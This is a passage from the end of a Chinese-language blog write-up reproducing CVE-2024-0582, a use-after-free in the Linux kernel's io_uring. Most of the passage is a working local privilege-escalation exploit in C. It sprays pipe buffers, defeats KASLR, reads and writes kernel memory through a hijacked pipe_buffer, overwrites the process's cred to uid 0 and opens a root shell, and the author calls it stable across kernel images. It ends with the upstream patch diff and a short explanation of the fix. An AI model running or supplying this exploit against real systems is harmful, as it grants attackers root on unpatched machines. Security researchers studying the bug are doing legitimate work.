exit(EXIT_FAILURE);
}
}

puts("[*] Allocating pipe_buffer::page ...");

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
write(pipe_fd[i][1], "arttnba3", 8);
}

puts("[*] Checking for UAF mmap address ...");

for (int i = 0; i < NR_BUFFERS; i += 2) {
uint64_t *buffer = buffers[i];
for (int j = 0; j < (NR_PAGES * PAGE_SIZE / sizeof(uint64_t)); j++) {
if (buffer[j] > 0xffff000000000000
&& buffer[j + 1] == 0x2000000000
&& buffer[j + 2] > 0xffffffff81000000) {
printf(
SUCCESS_MSG("[+] Got kernel pipe_buffer mapped at buffer:")
" %d-%d\n", i, j
);
printf(
INFO_MSG("[*] Leak pipe_buffer::page = ")"%lx\n", buffer[j]
);
printf(
INFO_MSG("[*] Leak pipe_buffer::ops = ")"%lx\n", buffer[j+2]
);
kern_pipe_buffer = (void*) &buffer[j];
goto out_find_pipe;
}
}
}

if (!kern_pipe_buffer) {
puts(ERR_MSG("[x] Failed to find kernel pipe_buffer in user space!"));
exit(EXIT_FAILURE);
}

out_find_pipe:

puts("[*] Overwriting victim pipe_buffer::page ...");
/* note that the granularity of KASLR is 256MB, i.e. 0x10000000*/
vmemmap_base = (uint64_t) kern_pipe_buffer->page & KASLR_MASK;
kern_pipe_buffer->page = (void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40);

for (int i = 0; i < PIPE_SPRAY_NR; i++) {
read(pipe_fd[i][0], &kernel_leak, sizeof(kernel_leak));
if (kernel_leak != *(uint64_t*) "arttnba3") {
printf(SUCCESS_MSG("[+] Got victim pipe at idx: ") "%d\n", i);
victim_idx = i;
break;
}
}

if (victim_idx == -1) {
puts(ERR_MSG("[x] Failed to find the victim pipe!"));
exit(EXIT_FAILURE);
}

for (uint64_t loop_nr = 0; 1; loop_nr++) {
if (kernel_leak > 0xffffffff81000000
&& (kernel_leak & 0xfff) < 0x100) {
kernel_base = kernel_leak & 0xfffffffffffff000;
if (loop_nr != 0) {
puts("");
}
printf(
INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
);
printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
break;
}

for (int i = 0; i < 80; i++) {
putchar('\b');
}
printf(
"[No.%ld loop] Got unmatched data: %lx, keep looping...",
loop_nr,
kernel_leak
);

vmemmap_base -= KASLR_GRANULARITY;
read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x9d000 / 0x1000 * 0x40),
kern_pipe_buffer,
pipe_fd[victim_idx],
&kernel_leak,
sizeof(kernel_leak)
);
}

puts("[*] Finding task_struct of current process in kernel space ...");

prctl(PR_SET_NAME, "rat3bant");
uid = getuid();
gid = getgid();

for (int i = 0; 1; i++) {
uint64_t *comm_addr;

read_kernel_page_by_pipe(
(void*) (vmemmap_base + 0x40 * i),
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff8
);

comm_addr = memmem(buf, 0xff0, "rat3bant", 8);

if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
&& (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
&& (comm_addr[-2] == comm_addr[-3])) { /* should be equal */

printf(
SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
(vmemmap_base + i * 0x40)
);
printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

cred_kaddr = comm_addr[-2];
cred_data = (void*) (buf + (cred_kaddr & (PAGE_SIZE - 1)));
page_offset_base = cred_kaddr & KASLR_MASK;

while (1) {
cred_kpage_addr = vmemmap_base + \
(cred_kaddr - page_offset_base) / 0x1000 * 0x40;

read_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xffe
);
if (cred_data->uid == uid
&& cred_data->gid == gid) {
printf(
SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
cred_kpage_addr
);
break;
}

page_offset_base -= KASLR_GRANULARITY;
}

break;
}
}

puts("[*] Overwriting cred and granting root privilege...");

cred_data->uid = 0;
cred_data->gid = 0;

write_kernel_page_by_pipe(
(void*) cred_kpage_addr,
kern_pipe_buffer,
pipe_fd[victim_idx],
buf,
0xff0
);

setresuid(0, 0, 0);
setresgid(0, 0, 0);

get_root_shell();
}

int main(int argc, char **argv, char **envp)
{
exploit();
return 0;
}

运行即可完成提权,非常™稳定而且不依赖于特定的内核镜像:

0x03. 漏洞修复

这个漏洞最终在 这个 commit 当中被修复,修复方式是:

  • 添加了一个记录延迟释放 buffer 的链表与对应结构
  • 将 buffer 释放推迟到调用 ->release() 时(而非原来的即时释放),从而在 mmap() 区域销毁后才会回收这部分内存

这个修改引入了更适用的架构,而且确乎避免了 UAF 的问题,在笔者看来还是比较成功的:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
diff --git a/include/linux/io_uring_types.h b/include/linux/io_uring_types.h
index d3009d56af0ba3..805bb635cdf558 100644
--- a/include/linux/io_uring_types.h
+++ b/include/linux/io_uring_types.h
@@ -340,6 +340,9 @@ struct io_ring_ctx {

struct list_head io_buffers_cache;

+ /* deferred free list, protected by ->uring_lock */
+ struct hlist_head io_buf_list;
+
/* Keep this last, we don't need it for the fast path */
struct wait_queue_head poll_wq;
struct io_restriction restrictions;
diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
index e40b1143821045..3a216f0744dd66 100644
--- a/io_uring/io_uring.c
+++ b/io_uring/io_uring.c
@@ -325,6 +325,7 @@ static __cold struct io_ring_ctx *io_ring_ctx_alloc(struct io_uring_params *p)
INIT_LIST_HEAD(&ctx->sqd_list);
INIT_LIST_HEAD(&ctx->cq_overflow_list);
INIT_LIST_HEAD(&ctx->io_buffers_cache);
+ INIT_HLIST_HEAD(&ctx->io_buf_list);
io_alloc_cache_init(&ctx->rsrc_node_cache, IO_NODE_ALLOC_CACHE_MAX,
sizeof(struct io_rsrc_node));
io_alloc_cache_init(&ctx->apoll_cache, IO_ALLOC_CACHE_MAX,
@@ -2950,6 +2951,7 @@ static __cold void io_ring_ctx_free(struct io_ring_ctx *ctx)
ctx->mm_account = NULL;
}
io_rings_free(ctx);
+ io_kbuf_mmap_list_free(ctx);

percpu_ref_exit(&ctx->refs);
free_uid(ctx->user);
diff --git a/io_uring/kbuf.c b/io_uring/kbuf.c
index a1e4239c7d75d1..85e680fc74ce2c 100644
--- a/io_uring/kbuf.c
+++ b/io_uring/kbuf.c
@@ -33,6 +33,11 @@ struct io_provide_buf {
__u16 bid;
};

+struct io_buf_free {
+ struct hlist_node list;
+ void *mem;
+};
+
static inline struct io_buffer_list *io_buffer_get_list(struct io_ring_ctx *ctx,
unsigned int bgid)
{
@@ -223,7 +228,10 @@ static int __io_remove_buffers(struct io_ring_ctx *ctx,
if (bl->is_mapped) {
i = bl->buf_ring->tail - bl->head;
if (bl->is_mmap) {
- folio_put(virt_to_folio(bl->buf_ring));
+ /*
+ * io_kbuf_list_free() will free the page(s) at
+ * ->release() time.
+ */
bl->buf_ring = NULL;
bl->is_mmap = 0;
} else if (bl->buf_nr_pages) {
@@ -531,18 +539,28 @@ error_unpin:
return -EINVAL;
}

-static int io_alloc_pbuf_ring(struct io_uring_buf_reg *reg,
+static int io_alloc_pbuf_ring(struct io_ring_ctx *ctx,
+ struct io_uring_buf_reg *reg,
struct io_buffer_list *bl)
{
- gfp_t gfp = GFP_KERNEL_ACCOUNT | __GFP_ZERO | __GFP_NOWARN | __GFP_COMP;
+ struct io_buf_free *ibf;
size_t ring_size;
void *ptr;

ring_size = reg->ring_entries * sizeof(struct io_uring_buf_ring);
- ptr = (void *) __get_free_pages(gfp, get_order(ring_size));
+ ptr = io_mem_alloc(ring_size);
if (!ptr)
return -ENOMEM;

+ /* Allocate and store deferred free entry */
+ ibf = kmalloc(sizeof(*ibf), GFP_KERNEL_ACCOUNT);
+ if (!ibf) {
+ io_mem_free(ptr);
+ return -ENOMEM;
+ }
+ ibf->mem = ptr;
+ hlist_add_head(&ibf->list, &ctx->io_buf_list);
+
bl->buf_ring = ptr;
bl->is_mapped = 1;
bl->is_mmap = 1;
@@ -599,7 +617,7 @@ int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg)
if (!(reg.flags & IOU_PBUF_RING_MMAP))
ret = io_pin_pbuf_ring(&reg, bl);
else
- ret = io_alloc_pbuf_ring(&reg, bl);
+ ret = io_alloc_pbuf_ring(ctx, &reg, bl);

if (!ret) {
bl->nr_entries = reg.ring_entries;
@@ -649,3 +667,19 @@ void *io_pbuf_get_address(struct io_ring_ctx *ctx, unsigned long bgid)

return bl->buf_ring;
}
+
+/*
+ * Called at or after ->release(), free the mmap'ed buffers that we used
+ * for memory mapped provided buffer rings.
+ */
+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx)
+{
+ struct io_buf_free *ibf;
+ struct hlist_node *tmp;
+
+ hlist_for_each_entry_safe(ibf, tmp, &ctx->io_buf_list, list) {
+ hlist_del(&ibf->list);
+ io_mem_free(ibf->mem);
+ kfree(ibf);
+ }
+}
diff --git a/io_uring/kbuf.h b/io_uring/kbuf.h
index f2d615236b2cb9..6c7646e6057cf5 100644
--- a/io_uring/kbuf.h
+++ b/io_uring/kbuf.h
@@ -51,6 +51,8 @@ int io_provide_buffers(struct io_kiocb *req, unsigned int issue_flags);
int io_register_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);
int io_unregister_pbuf_ring(struct io_ring_ctx *ctx, void __user *arg);

+void io_kbuf_mmap_list_free(struct io_ring_ctx *ctx);
+
unsigned int __io_put_kbuf(struct io_kiocb *req, unsigned issue_flags);

bool io_kbuf_recycle_legacy(struct io_kiocb *req, unsigned issue_flags);

【CVE.0x0C】CVE-2024-0582 漏洞复现及简要分析
https://arttnba3.github.io/2025/02/22/CVE-0X0C-CVE-2024-0582/
作者
arttnba3
发布于
2025年2月22日
许可协议